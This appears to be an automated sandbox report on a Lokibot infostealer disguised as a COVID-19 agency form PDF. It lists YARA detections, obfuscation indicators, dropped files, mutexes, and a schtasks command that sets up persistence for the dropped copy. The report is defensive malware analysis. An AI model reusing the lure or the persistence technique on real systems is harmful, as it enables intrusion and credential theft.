Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs | Cryptographic APIs: 'CreateDecryptor'
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs | Cryptographic APIs: 'CreateDecryptor'
Source: qvDFOnW.exe.0.dr, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs | Cryptographic APIs: 'CreateDecryptor'
Source: qvDFOnW.exe.0.dr, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs | Cryptographic APIs: 'CreateDecryptor'
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@6/6@0/1
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 6_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 6_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | File created: C:\Users\user\AppData\Roaming\qvDFOnW.exe
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Mutant created: \Sessions\1\BaseNamedObjects\jwmgAWN
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4244:120:WilError_01
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | File created: C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp | Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp | Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp | Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Virustotal: Detection: 34%
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | ReversingLabs: Detection: 19%
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | File read: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Source: unknown | Process created: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe 'C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe'
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qvDFOnW' /XML 'C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp'
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Process created: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qvDFOnW' /XML 'C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp'
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Process created: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Static file information: File size 1109504 > 1048576
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation:

.NET source code contains method to dynamically call methods (often used by packers)
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs | .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: qvDFOnW.exe.0.dr, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs | .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs | .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs | .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs | .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs | .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Yara detected aPLib compressed binary
Source: Yara match | File source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe PID: 5708, type: MEMORY
Source: Yara match | File source: Process Memory Space: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe PID: 3704, type: MEMORY
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_002D8EC7 push es; retn 0000h | 0_2_002D8ECA
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_00B8C148 push cs; ret | 0_2_00B8C156
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_00B8B42A push es; ret | 0_2_00B8B42E
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_00B89F93 push es; ret | 0_2_00B89F97
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF6DE7 push eax; iretd | 0_2_04CF6DF2
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF6DFF push ecx; iretd | 0_2_04CF6E06
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF6DF3 push ebx; iretd | 0_2_04CF6DFA
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF6EDF push ebx; iretd | 0_2_04CF6EE6
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF6E8F push edi; iretd | 0_2_04CF6E92
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF6E93 push edx; iretd | 0_2_04CF6E96
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF6EAF push edi; iretd | 0_2_04CF6EB2
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF6EAB push ebp; iretd | 0_2_04CF6EAE
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF6EB3 pushad ; iretd | 0_2_04CF6EBA
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF6E6F pushad ; iretd | 0_2_04CF6E72
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF6E0F push edx; iretd | 0_2_04CF6E16
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF6E3F push ebp; iretd | 0_2_04CF6E42
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF6E37 push edi; iretd | 0_2_04CF6E3A
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF5634 push cs; retf | 0_2_04CF5635
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF6E33 push edi; iretd | 0_2_04CF6E36
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF6FEB push edx; iretd | 0_2_04CF6FF2
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF6FE7 push esp; iretd | 0_2_04CF6FEA
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF6F8F push ds; iretd | 0_2_04CF6F9A
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF6F9B push eax; iretd | 0_2_04CF6F9E
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF6FAB push ebp; iretd | 0_2_04CF6FB2
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF6F53 push ebx; iretd | 0_2_04CF6F56
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF6F6F push ebp; iretd | 0_2_04CF6F72
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF6F07 push edx; iretd | 0_2_04CF6F0A
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF6F17 push edi; iretd | 0_2_04CF6F1A
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF6F2F push ecx; iretd | 0_2_04CF6F32
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF6F27 push esp; iretd | 0_2_04CF6F2A
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe | Code function: 0_2_04CF6F3B push eax; iretd | 0_2_04CF6F3E
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, CMGEZR8d9sV5or5oCT/OTcwV6T8vLYWOKgwix.cs | High entropy of concatenated method names: '.cctor', 'z9ydY6ER8D', 'FCxdQipVZb', 'sLIdIBTMRo', 'oJGdLVFE43', 'xpxdRyHYFN', 'JhBdaUM7SO', 'lEhdijSmdY', 'UF0dB3uwFK', 'MUUdtwqgtF'
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs | High entropy of concatenated method names: '.cctor', 'hYKDNVuThr0tR', 'cgQZr4MJH9', 'Tv6Z1evBw9', 'g6cZzJCx19', 'mlB6gleQlU', 'do86dVGMDT', 'y8A6xbswHg', 'eNy6ZoenxX', 'mNr660NRAv'
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, dbnXlqp7dn8caOjpkD/KESKfVUYeSsL3MMKqs.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'yYtdls8T6v', 'o9UEip5rjI', 'pRBEBVI2li', 'NKFEtCIav9', 'dc8EnLMpuG', 'xeRECMRGVv', 'cvDEslt5eo', 'GwLE4lsLUu'
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, ML3LFDD5R0VNWJw5lq/tnkGD7lgAPwn8VbqeW.cs | High entropy of concatenated method names: '.cctor', 'Lr6dZPdt2B', 'l7id665cu9', 'IDmdEHUkYO', '.ctor', 'L6udAJ5vKq', 'Vj7dh8Lfmh', 'aJPdVvf5Ct', 'MGxd3JujLd', 'fVHdGVMDKg'
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, DuH5yrQLwuUs0REMlG/o3WxudYdqIOp1ISAbO.cs | High entropy of concatenated method names: '.ctor', 'rNHxXx8GlM', 'h0dx9X893a', 'fiSxO8vkhK', 'GKTxjQub0Z', 'tQXx1O9BHS', 'a2mxzf0Cd6', 'AuLZdcIDkE', 'HLkZxajJHh', 'BLNZ6vg9lE'
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, D0aORlo8jsHpwwwlBi/fo3uqgS19djuIhRc4J.cs | High entropy of concatenated method names: '.cctor', '.ctor', 'OTcPwV68v', 'uYWJOKgwi', 'UsVH5or5o', 'ATL0WsxgF', 'oXxmDmxVc', 'q2fwxV4UD', 'QddqqIOp1', 'tSAfbOPuH'
Source: qvDFOnW.exe.0.dr, CMGEZR8d9sV5or5oCT/OTcwV6T8vLYWOKgwix.cs | High entropy of concatenated method names: '.cctor', 'z9ydY6ER8D', 'FCxdQipVZb', 'sLIdIBTMRo', 'oJGdLVFE43', 'xpxdRyHYFN', 'JhBdaUM7SO', 'lEhdijSmdY', 'UF0dB3uwFK', 'MUUdtwqgtF'
Source: qvDFOnW.exe.0.dr, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs | High entropy of concatenated method names: '.cctor', 'hYKDNVuThr0tR', 'cgQZr4MJH9', 'Tv6Z1evBw9', 'g6cZzJCx19', 'mlB6gleQlU', 'do86dVGMDT', 'y8A6xbswHg', 'eNy6ZoenxX', 'mNr660NRAv'
Source: qvDFOnW.exe.0.dr, dbnXlqp7dn8caOjpkD/KESKfVUYeSsL3MMKqs.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'yYtdls8T6v', 'o9UEip5rjI', 'pRBEBVI2li', 'NKFEtCIav9', 'dc8EnLMpuG', 'xeRECMRGVv', 'cvDEslt5eo', 'GwLE4lsLUu'
Source: qvDFOnW.exe.0.dr, ML3LFDD5R0VNWJw5lq/tnkGD7lgAPwn8VbqeW.cs | High entropy of concatenated method names: '.cctor', 'Lr6dZPdt2B', 'l7id665cu9', 'IDmdEHUkYO', '.ctor', 'L6udAJ5vKq', 'Vj7dh8Lfmh', 'aJPdVvf5Ct', 'MGxd3JujLd', 'fVHdGVMDKg'
Source: qvDFOnW.exe.0.dr, DuH5yrQLwuUs0REMlG/o3WxudYdqIOp1ISAbO.cs | High entropy of concatenated method names: '.ctor', 'rNHxXx8GlM', 'h0dx9X893a', 'fiSxO8vkhK', 'GKTxjQub0Z', 'tQXx1O9BHS', 'a2mxzf0Cd6', 'AuLZdcIDkE', 'HLkZxajJHh', 'BLNZ6vg9lE'
Source: qvDFOnW.exe.0.dr, D0aORlo8jsHpwwwlBi/fo3uqgS19djuIhRc4J.cs | High entropy of concatenated method names: '.cctor', '.ctor', 'OTcPwV68v', 'uYWJOKgwi', 'UsVH5or5o', 'ATL0WsxgF', 'oXxmDmxVc', 'q2fwxV4UD', 'QddqqIOp1', 'tSAfbOPuH'
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, CMGEZR8d9sV5or5oCT/OTcwV6T8vLYWOKgwix.cs | High entropy of concatenated method names: '.cctor', 'z9ydY6ER8D', 'FCxdQipVZb', 'sLIdIBTMRo', 'oJGdLVFE43', 'xpxdRyHYFN', 'JhBdaUM7SO', 'lEhdijSmdY', 'UF0dB3uwFK', 'MUUdtwqgtF'
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs | High entropy of concatenated method names: '.cctor', 'hYKDNVuThr0tR', 'cgQZr4MJH9', 'Tv6Z1evBw9', 'g6cZzJCx19', 'mlB6gleQlU', 'do86dVGMDT', 'y8A6xbswHg', 'eNy6ZoenxX', 'mNr660NRAv'
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, dbnXlqp7dn8caOjpkD/KESKfVUYeSsL3MMKqs.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'yYtdls8T6v', 'o9UEip5rjI', 'pRBEBVI2li', 'NKFEtCIav9', 'dc8EnLMpuG', 'xeRECMRGVv', 'cvDEslt5eo', 'GwLE4lsLUu'
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, ML3LFDD5R0VNWJw5lq/tnkGD7lgAPwn8VbqeW.cs | High entropy of concatenated method names: '.cctor', 'Lr6dZPdt2B', 'l7id665cu9', 'IDmdEHUkYO', '.ctor', 'L6udAJ5vKq', 'Vj7dh8Lfmh', 'aJPdVvf5Ct', 'MGxd3JujLd', 'fVHdGVMDKg'
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, DuH5yrQLwuUs0REMlG/o3WxudYdqIOp1ISAbO.cs | High entropy of concatenated method names: '.ctor', 'rNHxXx8GlM', 'h0dx9X893a', 'fiSxO8vkhK', 'GKTxjQub0Z', 'tQXx1O9BHS', 'a2mxzf0Cd6', 'AuLZdcIDkE', 'HLkZxajJHh', 'BLNZ6vg9lE'
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, D0aORlo8jsHpwwwlBi/fo3uqgS19djuIhRc4J.cs | High entropy of concatenated method names: '.cctor', '.ctor', 'OTcPwV68v', 'uYWJOKgwi', 'UsVH5or5o', 'ATL0WsxgF', 'oXxmDmxVc', 'q2fwxV4UD', 'QddqqIOp1', 'tSAfbOPuH'
Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, CMGEZR8d9sV5or5oCT/OTcwV6T8vLYWOKgwix.cs | High entropy of concatenated method names: '.cctor', 'z9ydY6ER8D', 'FCxdQipVZb', 'sLIdIBTMRo', 'oJGdLVFE43', 'xpxdRyHYFN', 'JhBdaUM7SO', 'lEhdijSmdY', 'UF0dB3uwFK', 'MUUdtwqgtF'
Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs | High entropy of concatenated method names: '.cctor', 'hYKDNVuThr0tR', 'cgQZr4MJH9', 'Tv6Z1evBw9', 'g6cZzJCx19', 'mlB6gleQlU', 'do86dVGMDT', 'y8A6xbswHg', 'eNy6ZoenxX', 'mNr660NRAv'
Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, dbnXlqp7dn8caOjpkD/KESKfVUYeSsL3MMKqs.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'yYtdls8T6v', 'o9UEip5rjI', 'pRBEBVI2li', 'NKFEtCIav9', 'dc8EnLMpuG', 'xeRECMRGVv', 'cvDEslt5eo', 'GwLE4lsLUu'
Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, ML3LFDD5R0VNWJw5lq/tnkGD7lgAPwn8VbqeW.cs | High entropy of concatenated method names: '.cctor', 'Lr6dZPdt2B', 'l7id665cu9', 'IDmdEHUkYO', '.ctor', 'L6udAJ5vKq', 'Vj7dh8Lfmh', 'aJPdVvf5Ct', 'MGxd3JujLd', 'fVHdGVMDKg'
Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, DuH5yrQLwuUs0REMlG/o3WxudYdqIOp1ISAbO.cs | High entropy of concatenated method names: '.ctor', 'rNHxXx8GlM', 'h0dx9X893a', 'fiSxO8vkhK', 'GKTxjQub0Z', 'tQXx1O9BHS', 'a2mxzf0Cd6', 'AuLZdcIDkE', 'HLkZxajJHh', 'BLNZ6vg9lE'
Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, D0aORlo8jsHpwwwlBi/fo3uqgS19djuIhRc4J.cs | High entropy of concatenated method names: '.cctor', '.ctor', 'OTcPwV68v', 'uYWJOKgwi', 'UsVH5or5o', 'ATL0WsxgF', 'oXxmDmxVc', 'q2fwxV4UD', 'QddqqIOp1', 'tSAfbOPuH'
Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, CMGEZR8d9sV5or5oCT/OTcwV6T8vLYWOKgwix.cs | High entropy of concatenated method names: '.cctor', 'z9ydY6ER8D', 'FCxdQipVZb', 'sLIdIBTMRo', 'oJGdLVFE43', 'xpxdRyHYFN', 'JhBdaUM7SO', 'lEhdijSmdY', 'UF0dB3uwFK', 'MUUdtwqgtF'
